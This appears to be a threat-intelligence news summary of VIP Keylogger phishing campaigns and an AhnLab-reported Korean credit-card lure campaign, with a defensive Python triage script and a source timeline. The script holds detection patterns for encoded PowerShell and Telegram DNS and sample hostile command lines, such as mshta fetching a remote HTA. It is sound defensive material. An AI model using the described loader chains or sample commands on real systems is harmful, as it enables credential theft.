Researchers reported active phishing operations using business-document lures and fake "secure mail" messages to infect Windows users with VIP Keylogger and related infostealers. Splunk said attackers sent payment notices, procurement orders, and logistics updates carrying heavily obfuscated .vbs, .js, or .bat loaders that launched PowerShell stagers, hid data in environment variables, and used steganography in PNG files to rebuild the final payload. K7 Labs also tracked a malware-as-a-service VIP_Keylogger campaign, while Splunk said the malware injects into aspnet_compiler.exe and steals keystrokes, screenshots, browser and Outlook credentials, clipboard contents, and cryptocurrency wallet addresses before exfiltrating data to attacker infrastructure, including Telegram.
AhnLab separately detailed a South Korea-focused campaign impersonating a major credit card company with malicious LNK files that executed PowerShell and mshta, fetched an HTA with obfuscated VBScript, and displayed decoy documents to reduce suspicion. The malware changed behavior depending on whether Windows Defender was enabled: one path delivered AES-encrypted archives with backdoor, keylogging, clipboard theft, and information-stealing components, while the other used rundll32 to load a downloader that avoided VBox and VMware and then pulled additional payloads from Google Drive to steal browser, email, cookie, clipboard, and cryptocurrency wallet data. Defenders were urged to scrutinize email attachments and file types, monitor suspicious registry and PowerShell activity, and watch for script-launched processes and Telegram-related DNS traffic.
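The defender guidance in the paragraph above (scrutinize attachment types, watch for script-launched processes and encoded or environment-variable-staged PowerShell, and flag Telegram-related DNS from unexpected processes) can be turned into a small triage pass over endpoint telemetry. The block below is an added example written for this page; it is not code from Splunk, AhnLab, K7 Labs or Mallory. The event schema (`parent`, `image`, `cmdline`, `qname`), the process-name sets and the sample records are all constructed assumptions, not any vendor's field names or real telemetry, and the rule names are illustrative labels.

```python
"""Triage rules for the behaviours described in the story (added example).

Field names and sample events are constructed; they are not a vendor schema
and not observations from the reported campaigns.
"""
from dataclasses import dataclass
import re

# Assumed process groupings (illustrative, adjust to your environment).
MAIL_CLIENTS = {"outlook.exe", "thunderbird.exe"}
SCRIPT_HOSTS = {"wscript.exe", "cscript.exe", "mshta.exe", "cmd.exe"}
STAGERS = {"powershell.exe", "pwsh.exe", "mshta.exe", "rundll32.exe"}
INJECT_TARGETS = {"aspnet_compiler.exe"}

# Attachment/script extensions named in the story (.vbs/.js/.bat loaders, HTA, LNK).
SCRIPT_EXT_RE = re.compile(r"\.(vbs|js|bat|hta|lnk)\b", re.I)
# Encoded commands, Base64 decoding, or reads from environment variables (staging technique in the story).
ENCODED_PS_RE = re.compile(r"(?i)(-enc(odedcommand)?\s|frombase64string|\[env(ironment)?\]::|\$env:)")
# Telegram API/host names; matched on the suffix so api.telegram.org etc. are caught.
TELEGRAM_RE = re.compile(r"(^|\.)(telegram\.org|t\.me)$", re.I)


@dataclass
class ProcEvent:
    parent: str   # parent process image name
    image: str    # created process image name
    cmdline: str  # full command line


@dataclass
class DnsEvent:
    image: str  # process that issued the query
    qname: str  # queried name


def proc_findings(ev: ProcEvent) -> list:
    """Return the rule names a single process-creation event trips."""
    parent, image = ev.parent.lower(), ev.image.lower()
    findings = []
    # A mail client running a script host on a .vbs/.js/.bat attachment.
    if parent in MAIL_CLIENTS and image in SCRIPT_HOSTS and SCRIPT_EXT_RE.search(ev.cmdline):
        findings.append("mail-client-launched-script")
    # Script host (wscript/cscript/mshta/cmd) spawning a PowerShell/mshta/rundll32 stager.
    if parent in SCRIPT_HOSTS and image in STAGERS:
        findings.append("script-host-launched-stager")
    # explorer.exe starting a stager whose command line names a script or HTA,
    # as happens when a user double-clicks a malicious LNK.
    if parent == "explorer.exe" and image in STAGERS and SCRIPT_EXT_RE.search(ev.cmdline):
        findings.append("lnk-style-launch")
    # PowerShell with an encoded command or environment-variable staging.
    if image in {"powershell.exe", "pwsh.exe"} and ENCODED_PS_RE.search(ev.cmdline):
        findings.append("encoded-or-env-staged-powershell")
    # A stager starting aspnet_compiler.exe, the injection target named by Splunk.
    if image in INJECT_TARGETS and parent in STAGERS:
        findings.append("stager-spawned-aspnet-compiler")
    return findings


def dns_findings(ev: DnsEvent) -> list:
    """Telegram DNS is only high-signal when the querying process is not a client app."""
    if not TELEGRAM_RE.search(ev.qname):
        return []
    if ev.image.lower() in STAGERS | INJECT_TARGETS:
        return ["telegram-dns-from-suspicious-process"]
    return ["telegram-dns-review"]  # common legitimate use; review rather than alert


def triage(proc_events, dns_events) -> list:
    """Run all rules and return (image, rule) pairs in event order."""
    out = []
    for ev in proc_events:
        out.extend((ev.image, f) for f in proc_findings(ev))
    for ev in dns_events:
        out.extend((ev.image, f) for f in dns_findings(ev))
    return out


# Constructed sample telemetry (not real observations).
SAMPLE_PROCS = [
    ProcEvent("outlook.exe", "wscript.exe", r'wscript.exe "C:\Users\u\Downloads\Payment_Notice.vbs"'),
    ProcEvent("wscript.exe", "powershell.exe", "powershell.exe -nop -w hidden -enc SQBFAFgA"),
    ProcEvent("powershell.exe", "aspnet_compiler.exe", r"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"),
    ProcEvent("explorer.exe", "mshta.exe", "mshta.exe http://example.invalid/secure_mail.hta"),
    ProcEvent("explorer.exe", "powershell.exe", "powershell.exe Get-ChildItem"),  # benign admin use
    ProcEvent("services.exe", "svchost.exe", "svchost.exe -k netsvcs"),           # benign
]
SAMPLE_DNS = [
    DnsEvent("aspnet_compiler.exe", "api.telegram.org"),
    DnsEvent("chrome.exe", "web.telegram.org"),
    DnsEvent("svchost.exe", "time.windows.com"),
]

if __name__ == "__main__":
    for image, rule in triage(SAMPLE_PROCS, SAMPLE_DNS):
        print(f"{image:22s} {rule}")
```

The rules are deliberately chained on parent/child relationships rather than on file hashes, because the story describes heavily obfuscated loaders and a malware-as-a-service model, where hashes rotate quickly but the process lineage (mail client → script host → PowerShell → aspnet_compiler.exe → Telegram) is far more stable.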

4 events from the most recent confirmed update back to the earliest known activity.
Splunk Threat Research Team analyzed an active VIP Keylogger phishing campaign and reviewed more than 200 loader samples observed from March to April 2026. The campaign used business-themed phishing lures and obfuscated script loaders to infect Windows users and steal credentials and other data.
Cyber Security News reported Splunk's findings on an active VIP Keylogger phishing campaign that used business-document lures, steganography, and PowerShell-based loaders. The report also highlighted data theft capabilities and exfiltration to command-and-control infrastructure including Telegram.
AhnLab disclosed a malware campaign distributing malicious files disguised as secure emails from a major Korean credit card company. The campaign used LNK files to launch mshta and PowerShell, then conditionally delivered different payload chains depending on whether Windows Defender was enabled.
K7 Labs published a report on a malware-as-a-service campaign involving VIP Keylogger. The reference establishes public reporting on the campaign by March 6, 2026.
Sources (4 references tracked): cybersecuritynews.com; asec.ahnlab.com (two references); labs.k7computing.com.